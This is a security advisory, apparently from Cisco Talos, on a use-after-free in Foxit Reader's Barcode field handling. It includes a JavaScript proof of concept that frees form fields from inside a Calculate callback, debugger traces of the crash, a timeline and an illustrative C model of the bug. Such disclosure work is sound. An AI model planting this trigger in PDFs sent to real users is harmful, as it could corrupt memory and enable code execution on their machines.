Foxit Reader Barcode Calculate CPDF_FormField Use-After-Free Vulnerability
Foxit Reader contains a use-after-free vulnerability in its handling of Barcode field objects; a malicious PDF file or website can trigger it, leading to memory corruption and arbitrary code execution. 2025-12-19 Author: talosintelligence.com

SUMMARY

A use-after-free vulnerability exists in the way Foxit Reader handles a Barcode field object. A specially crafted JavaScript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 2025.2.0.33046

PRODUCT URLS

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

DETAILS

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

JavaScript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles a Barcode object. This can be illustrated by the following proof-of-concept code:

function main() {
    // Attach delete_page() as the Calculate action of the barcode field.
    getField("Barcode Field0").setAction("Calculate", 'delete_page();');
    // Adding and checking a new field makes the form recalculate, which runs
    // the Calculate action attached above.
    app.activeDocs[0].addField('aaaa', "radiobutton", 1, [18, 7, 3, 20]);
    app.activeDocs[0].getField('aaaa').checkThisBox(0, true);
}

function delete_page() {
    // Runs while the barcode field is being recalculated.
    event.value = 'b';
    // Frees every object associated with the page, including the CPDF_FormField
    // that the recalculation code is still holding a pointer to.
    app.activeDocs[0].deletePages();
}

The above code simply assigns a callback function to the Calculate event for the field Barcode Field0, which is promptly triggered by a call to getField. In the action callback, a call to deletePages is made, which in turn frees all the objects associated with a page. The use-after-free vulnerability occurs when a CPDF_FormField object is freed by deletePages() and subsequently accessed without any validation. We can observe the following in the debugger (with PageHeap enabled):

FoxitPDFReader!safe_vsnprintf+0x337ca7:
00007ff6`b79f6ec7 b948000000      mov     ecx,48h  ;<---------------------- (1)
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cac:
00007ff6`b79f6ecc e87f882c00      call    FoxitPDFReader!safe_vsnprintf+0x600530 (00007ff6`b7cbf750);<----------------- (2)
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cb1:
00007ff6`b79f6ed1 488985d8000000  mov     qword ptr [rbp+0D8h],rax ss:00000019`12ef8b58=0000017cfca95fb0
0:000> r
rax=0000017cdade0fb0 rbx=0000017c91a39fd0 rcx=000000007ffe0380
rdx=d0d0d0d0d0d0d0d0 rsi=0000000000400000 rdi=0000017cfca95fb0
rip=00007ff6b79f6ed1 rsp=0000001912ef8980 rbp=0000001912ef8a80
 r8=0000000000000000  r9=0000000000000000 r10=0000000000000000
r11=0000017cdade0fb0 r12=0000017cfca95fb0 r13=0000000000000000
r14=00007ff6bccd4ce4 r15=0000017c91a39ed0
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
FoxitPDFReader!safe_vsnprintf+0x337cb1:
00007ff6`b79f6ed1 488985d8000000  mov     qword ptr [rbp+0D8h],rax ss:00000019`12ef8b58=0000017cfca95fb0
0:000> dd rax                                                          ;<----------------- (3)
0000017c`dade0fb0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
0000017c`dade0fc0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
0000017c`dade0fd0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
0000017c`dade0fe0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
0000017c`dade0ff0  c0c0c0c0 c0c0c0c0 d0d0d0d0 d0d0d0d0
0000017c`dade1000  ???????? ???????? ???????? ????????
0000017c`dade1010  ???????? ???????? ???????? ????????
0000017c`dade1020  ???????? ???????? ???????? ????????
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cb8:
00007ff6`b79f6ed8 4c8bbdd0000000  mov     r15,qword ptr [rbp+0D0h] ss:00000019`12ef8b50=0000017c91a39ed0
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cbf:
00007ff6`b79f6edf 4885c0          test    rax,rax
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cc2:
00007ff6`b79f6ee2 7413            je      FoxitPDFReader!safe_vsnprintf+0x337cd7 (00007ff6`b79f6ef7) [br=0]
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cc4:
00007ff6`b79f6ee4 4c8bc7          mov     r8,rdi
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cc7:
00007ff6`b79f6ee7 498bd7          mov     rdx,r15
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cca:
00007ff6`b79f6eea 488bc8          mov     rcx,rax
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337ccd:
00007ff6`b79f6eed e88e3d0100      call    FoxitPDFReader!safe_vsnprintf+0x34ba60 (00007ff6`b7a0ac80) ;<----------------- (4)
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cd2:
00007ff6`b79f6ef2 4c8bf0          mov     r14,rax
0:000> dq 0000017c`dade0fb0   ;<----------------------------------- (5)
0000017c`dade0fb0  00000905`00000004 0000017c`91a39ed0
0000017c`dade0fc0  0000017c`fca95fb0 00000000`00000000
0000017c`dade0fd0  00000000`00000000 00000000`00000000
0000017c`dade0fe0  00000008`00000000 c0c0c0c0`00000000
0000017c`dade0ff0  00000000`00000000 d0d0d0d0`d0d0d0d0
0000017c`dade1000  ????????`???????? ????????`????????
0000017c`dade1010  ????????`???????? ????????`????????
0000017c`dade1020  ????????`???????? ????????`????????

The CPDF_InterForm::AddTerminalField method creates a CPDF_FormField object by calling a function at (2), and the size of the object is passed to the function at (1). After allocation, the vulnerable object is examined at (3). The method called at (4) initializes the CPDF_FormField object. After the initialization, its content can be observed at (5).

0:000> r
rax=0000000000000001 rbx=0000017c91a39fd0 rcx=0000017cb4260000
rdx=0000017cb4260000 rsi=0000017cb0fa0fc0 rdi=0000017cdade0fb0
rip=00007ff6b79f99b1 rsp=0000001912efccc0 rbp=000000000000000c
 r8=0000000000000000  r9=0000000000000001 r10=00000000ffffffef
r11=0000001912efcbf0 r12=0000001912efcd98 r13=0000017c91a39ed0
r14=0000000000000000 r15=0000017cfca95fb0
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
FoxitPDFReader!safe_vsnprintf+0x33a791:
00007ff6`b79f99b1 488bcf          mov     rcx,rdi   ; <----------------------------- (6)
0:000> p
FoxitPDFReader!safe_vsnprintf+0x33a794:
00007ff6`b79f99b4 e8775e2c00      call    FoxitPDFReader!safe_vsnprintf+0x600610 (00007ff6`b7cbf830)  ; <----------------------------- (7)
0:000> p
FoxitPDFReader!safe_vsnprintf+0x33a799:
00007ff6`b79f99b9 49c7042400000000 mov     qword ptr [r12],0 ds:00000019`12efcd98=0000017cdade0fb0
0:000> dq 0000017cdade0fb0                         ; <----------------------------- (8)
0000017c`dade0fb0  ????????`???????? ????????`????????
0000017c`dade0fc0  ????????`???????? ????????`????????
0000017c`dade0fd0  ????????`???????? ????????`????????
0000017c`dade0fe0  ????????`???????? ????????`????????
0000017c`dade0ff0  ????????`???????? ????????`????????
0000017c`dade1000  ????????`???????? ????????`????????
0000017c`dade1010  ????????`???????? ????????`????????
0000017c`dade1020  ????????`???????? ????????`????????
0:000> p
FoxitPDFReader!safe_vsnprintf+0x33a7a1:
00007ff6`b79f99c1 41c6859100000001 mov     byte ptr [r13+91h],1 ds:0000017c`91a39f61=01

Later, when the JavaScript API deletePages() is called, it frees all the objects associated with the page. It invokes CPDF_InterForm::DeleteField, which frees the vulnerable CPDF_FormField object. The register RCX at (6) contains the vulnerable CPDF_FormField object. The method called at (7) frees the object, and the content of the object is examined at (8) after the free operation.

The vulnerable object is later used without any validation. This can be observed in a debugger at the time of the crash:

0:000> g
FoxitPDFReader!safe_vsnprintf+0x351e0b:
00007ff6`b7a1102b 8b01            mov     eax,dword ptr [rcx] ds:0000017c`dade0fb0=???????? <------------------- (9)
0:000> u
FoxitPDFReader!safe_vsnprintf+0x351e0b:
00007ff6`b7a1102b 8b01            mov     eax,dword ptr [rcx]
00007ff6`b7a1102d 83c0fe          add     eax,0FFFFFFFEh
00007ff6`b7a11030 83f806          cmp     eax,6
00007ff6`b7a11033 0f872a060000    ja      FoxitPDFReader!safe_vsnprintf+0x352443 (00007ff6`b7a11663)
00007ff6`b7a11039 4898            cdqe
00007ff6`b7a1103b 488d0dbeef3ffe  lea     rcx,[FoxitPDFReader (00007ff6`b5e10000)]
00007ff6`b7a11042 448b8c81b016c001 mov     r9d,dword ptr [rcx+rax*4+1C016B0h]
00007ff6`b7a1104a 4c03c9          add     r9,rcx
0:000> kb
 # RetAddr               : Args to Child                                                           : Call Site
00 00007ff6`b766ca94     : 00000000`00000001 00000019`12efdce0 0000017c`dade0f00 0000017c`91a35f01 : FoxitPDFReader!safe_vsnprintf+0x351e0b
01 00007ff6`b765ffc8     : 0000017c`fa12ff01 0000017c`ffffffff 0000017c`fa12ffb0 0000017c`fa12ffb0 : FoxitPDFReader!std::basic_streambuf<char,std::char_traits<char> >::pubimbue+0xf3cb4
02 00007ff6`b7a0aff6     : 00007ff6`bccd4cc4 00000000`00000001 00000019`12efde30 0000017c`98a24fe0 : FoxitPDFReader!std::basic_streambuf<char,std::char_traits<char> >::pubimbue+0xe71e8
03 00007ff6`b8df82d6     : 0000017c`fa12ffb0 00000000`00000000 0000017d`00000000 00007ff6`b8d50a01 : FoxitPDFReader!safe_vsnprintf+0x34bdd6
04 00007ff6`b8dd10e3     : 0000017c`989f6f01 00000000`00000000 0000017c`989ecff0 0000017c`989ecff0 : FoxitPDFReader!safe_vsnprintf+0x17390b6
05 00007ff6`b92b4d79     : 0000017c`989c3ff0 00000019`12efe048 0000017c`989ecff0 0000017c`989f6fe0 : FoxitPDFReader!safe_vsnprintf+0x1711ec3
06 00007ff6`b983ab76     : 0000017d`63e2b0d0 00000019`12efdfb0 00000296`001b832d 00000019`12efe010 : FoxitPDFReader!FXJSE_GetClass+0x3d9
07 00007ff6`b9838e31     : 00000296`000af9b9 0000017c`8f4cc000 00000296`001801a1 00000296`00000069 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3074b6
08 00007ff6`b9838e31     : 00000296`001ed861 00000296`00206cd1 00000296`00206d21 00000296`00000069 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x305771
09 00007ff6`b9836560     : 00000296`001ed861 00000296`00000775 00000296`00206cd1 00000000`0000001a : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x305771
0a 00007ff6`b98360b7     : 00000000`00000000 00000000`00000000 00000000`00000002 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x302ea0
0b 00007ff6`b930b08f     : 00000019`12efe48c 00000019`12efe379 00000019`12efe4f8 00000000`00000005 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3029f7
0c 00007ff6`b930ab34     : 00000019`12efe4f8 0000017c`8f4cc000 00000296`00200005 0000017c`8f4d5110 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x559cf
0d 00007ff6`b92eaa2b     : 0000017c`8f4cc2b0 00000019`12efe5a0 0000017c`98480a50 0000017d`63e2b020 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x55474
0e 00007ff6`b92ea791     : 0000017d`63e2b050 0000017d`63e2b018 0000017c`8f4cc000 0000017c`81237fc0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3536b
0f 00007ff6`b92b2756     : 0000017c`cf5c6ff0 0000017d`63e2b050 0000017d`63e2b018 0000017c`cf5c6ff0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x350d1
10 00007ff6`b92b369b     : 0000017d`63e2b050 0000017c`cf5c6ff0 0000017d`63e24e80 0000017d`63e2b020 : FoxitPDFReader!FXJSE_Runtime_Release+0x1126
11 00007ff6`b8d69bed     : 00000000`00000000 0000017d`63e18fb8 0000017d`63e18fb8 0000017d`63e18fb0 : FoxitPDFReader!FXJSE_ExecuteScript+0x27b
12 00007ff6`b69bd4b5     : 0000017d`00000003 00000000`00000002 00000019`12efe970 00000019`12efe8b0 : FoxitPDFReader!safe_vsnprintf+0x16aa9cd
13 00007ff6`b69bc063     : 0000017c`970d1ff0 00000019`12efe920 00000000`00000000 0000017c`82756fb0 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a7e65
14 00007ff6`b69ba6b6     : 00007ff6`b69ba5e0 0000017c`970d1ff0 0000017c`fac54d00 0000017c`fc58ffb0 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a6a13
15 00007ff6`b60338b9     : 00007ff6`b69ba5e0 00000019`12efea60 0000017c`8ed07dc8 0000017c`df225fd0 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a5066
16 00007ff6`b62bdc4e     : 0000017c`8234ecb0 00000000`00020712 0000017c`82756fb0 00000019`12eff810 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x78f9
17 00007ff6`bae235a2     : 00000000`000001a9 00000000`00000001 00007ff6`b62bdbd0 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x6f73e
18 00007ff6`bae24aaf     : 0000017c`8234ecb0 00000000`00000001 00000000`00000000 00000000`00000001 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18efee2
19 00007ff6`bae1d9d4     : 00000000`00000000 0000017c`ba016eb8 00000000`00000001 00000000`00000429 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18f13ef
1a 00007ff6`bae1e494     : 00007ff6`bda0d048 00000000`00020712 0000017c`ba016e78 00007ff6`bae14038 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18ea314
1b 00007ffc`65d6ef5c     : 00000000`00000001 0000017c`ba016e20 00000000`00020712 00000000`00020712 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18eadd4
1c 00007ffc`65d6e684     : 00000000`00000000 00007ff6`bae1e440 00000019`12cb0800 00007ff6`bae15ce4 : USER32!UserCallWinProcCheckWow+0x50c
1d 00007ff6`b623d22a     : 00007ff6`bae1e440 0000017c`dea5a600 00000000`00000001 00007ff6`bdbcc190 : USER32!DispatchMessageWorker+0x494
1e 00007ff6`b623d324     : 00000000`00000001 00007ff6`bdbcc190 00000000`00000000 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x1593aa
1f 00007ff6`bb345df3     : 00000000`00000001 00007ff6`b5e10000 00000000`00000000 0000017c`b42ddf7c : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x1594a4
20 00007ff6`bb0837ba     : 00000000`00000001 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1e12733
21 00007ffc`664f7374     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1b500fa
22 00007ffc`670dcc91     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
23 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
0:000> !ext.heap -p -a 0000017c`dade0fb0
    address 0000017cdade0fb0 found in
    _DPH_HEAP_ROOT @ 17cb4261000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                17ce773e068:      17cdade0000             2000
    00007ffc671892b4 ntdll!RtlDebugFreeHeap+0x0000000000000038
    00007ffc670b5cc1 ntdll!RtlpFreeHeap+0x00000000000000c1
    00007ffc670b5b74 ntdll!RtlpFreeHeapInternal+0x0000000000000464
    00007ffc670b47b1 ntdll!RtlFreeHeap+0x0000000000000051
    00007ff6bb1b887c FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x0000000001c851bc
    00007ff6b7cbfc79 FoxitPDFReader!safe_vsnprintf+0x0000000000600a59
    00007ff6b7cbf846 FoxitPDFReader!safe_vsnprintf+0x0000000000600626
    00007ff6b79f99b9 FoxitPDFReader!safe_vsnprintf+0x000000000033a799
    00007ff6b79f9666 FoxitPDFReader!safe_vsnprintf+0x000000000033a446
    00007ff6b78ff4dd FoxitPDFReader!safe_vsnprintf+0x00000000002402bd
    00007ff6b78ffc96 FoxitPDFReader!safe_vsnprintf+0x0000000000240a76
    00007ff6b60705f7 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x000000000001b6f7
    00007ff6b6110856 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x000000000002c9d6
    00007ff6b6111235 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x000000000002d3b5
    00007ff6b6b97d14 FoxitPDFReader!CryptUIWizExport+0x0000000000020ba4
    00007ff6b8e5ba3c FoxitPDFReader!safe_vsnprintf+0x000000000179c81c
    00007ff6b8e220d3 FoxitPDFReader!safe_vsnprintf+0x0000000001762eb3
    00007ff6b92b4d79 FoxitPDFReader!FXJSE_GetClass+0x00000000000003d9
    00007ff6b983ab76 FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x00000000003074b6
    00007ff6b9838e31 FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x0000000000305771
    00007ff6b9838e31 FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x0000000000305771
    00007ff6b9836560 FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x0000000000302ea0
    00007ff6b98360b7 FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x00000000003029f7
    00007ff6b930b08f FoxitPDFReader!CFXJSE_Arguments::GetValue+0x00000000000559cf
    00007ff6b930ab34 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x0000000000055474
    00007ff6b92eaa2b FoxitPDFReader!CFXJSE_Arguments::GetValue+0x000000000003536b
    00007ff6b92ea791 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x00000000000350d1
    00007ff6b92b2756 FoxitPDFReader!FXJSE_Runtime_Release+0x0000000000001126
    00007ff6b92b369b FoxitPDFReader!FXJSE_ExecuteScript+0x000000000000027b
    00007ff6b8d69bed FoxitPDFReader!safe_vsnprintf+0x00000000016aa9cd
    00007ff6b766ca42 FoxitPDFReader!std::basic_streambuf<char,std::char_traits<char> >::pubimbue+0x00000000000f3c62
    00007ff6b765ffc8 FoxitPDFReader!std::basic_streambuf<char,std::char_traits<char> >::pubimbue+0x00000000000e71e8

The crash occurs at (9) when the object is dereferenced without any validation. Depending on the memory layout of the process, it may be possible to perform arbitrary read and write operations, which could ultimately be exploited to achieve arbitrary code execution.
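The allocate, free-inside-callback, dereference sequence described above, modelled in C as an added example (not Foxit's code and not the vendor's fix): `InterForm`, `FormField`, `add_terminal_field`, `delete_all_fields`, the two `calculate_*` functions and the action callbacks are constructed names, and the generation counter is one assumed mitigation pattern for a callback that may tear down the objects its caller still holds.

```c
#include <stdlib.h>

/* Constructed model of the object lifetime the advisory describes (added
 * example, not Foxit code): an InterForm owns its FormField objects, and a
 * Calculate action may run script that deletes the page, and with it every
 * field, while the caller still holds a raw pointer to the recalculated field. */
#define MAX_FIELDS 8

typedef struct { int type; int value; } FormField;   /* type: the dword read at (9) */

typedef struct InterForm {
    FormField *fields[MAX_FIELDS];
    int count;
    void (*calculate_action)(struct InterForm *); /* set via setAction("Calculate") */
    unsigned generation;                          /* bumped by every delete */
} InterForm;

/* Stands in for CPDF_InterForm::AddTerminalField. */
FormField *add_terminal_field(InterForm *f, int type) {
    if (f->count >= MAX_FIELDS) return NULL;
    FormField *fld = calloc(1, sizeof *fld);
    fld->type = type;
    f->fields[f->count++] = fld;
    return fld;
}

/* Stands in for deletePages() calling CPDF_InterForm::DeleteField on each field. */
void delete_all_fields(InterForm *f) {
    for (int i = 0; i < f->count; i++) free(f->fields[i]);
    f->count = 0;
    f->generation++;
}

/* Vulnerable shape: the pointer taken before the callback is dereferenced
 * after it, like the read at (9). Only safe while the action does not delete. */
int calculate_vulnerable(InterForm *f, int idx) {
    FormField *fld = f->fields[idx];
    if (f->calculate_action) f->calculate_action(f); /* may free fld */
    return fld->type;
}

/* Hardened shape (assumed mitigation): the form's generation is sampled before
 * the callback; if it changed, the field set was torn down and the stale
 * pointer is never touched. Returns -1 in that case. */
int calculate_hardened(InterForm *f, int idx) {
    FormField *fld = f->fields[idx];
    unsigned gen = f->generation;
    if (f->calculate_action) f->calculate_action(f);
    if (f->generation != gen) return -1;
    return fld->type;
}

/* The PoC's Calculate script: delete the page from inside the callback. */
void delete_page_action(InterForm *f) { delete_all_fields(f); }

/* A harmless Calculate script, used to show the normal path for contrast. */
void benign_action(InterForm *f) { (void)f; }
```

With `delete_page_action` attached, `calculate_hardened` refuses to touch the freed field and returns -1, while `calculate_vulnerable` would read freed memory exactly as the crash at (9) does.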

TIMELINE

2025-09-25 - Vendor Disclosure
2025-12-19 - Vendor Patch Release
2025-12-19 - Public Release

Discovered by KPC of Cisco Talos.


Source: https://talosintelligence.com/vulnerability_reports/TALOS-2025-2277